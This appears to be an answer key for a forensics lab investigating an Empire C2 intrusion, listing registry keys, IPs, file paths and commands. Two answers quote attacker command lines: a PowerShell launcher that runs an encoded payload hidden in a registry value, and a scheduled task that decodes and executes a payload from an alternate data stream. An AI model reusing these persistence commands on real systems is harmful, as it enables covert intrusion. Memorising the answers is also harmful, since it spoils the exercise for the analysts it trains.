1. No answer needed
2. No answer needed
3. No answer needed
4. 1. No answer needed
   2. 73,591
   3. 2021-01-06 01:35:50.464
5. No answer needed
6. No answer needed
7. No answer needed
8. No answer needed
9. No answer needed
10. 1. HKLM\System\CurrentControlSet\Enum\WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_SANDISK&PROD_U3_CRUZER_MICRO&REV_8.01#4054910EF19005B3&0#\FriendlyName
    2. \Device\HarddiskVolume3
    3. rundll32.exe
    4. C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta
    5. C:\Users\IEUser\Downloads\update.html
    6. C:\Windows\System32\mshta.exe
    7. 10.0.2.18
    8. 4443
    9. 172.30.1.253
    10. DESKTOP-O153T4R
    11. empirec2
    12. HKLM\SOFTWARE\Microsoft\Network\debug
    13. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Network debug).debug);start -Win Hidden -A \"-enc $x\" powershell";exit;
    14. 172.168.103.188
    15. c:\users\q\AppData:blah.txt
    16. "C:\WINDOWS\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($(cmd /c ''more < c:\users\q\AppData:blah.txt'''))))\""
    17. lsass.exe
    18. 172.30.1.253
    19. 80
    20. Empire
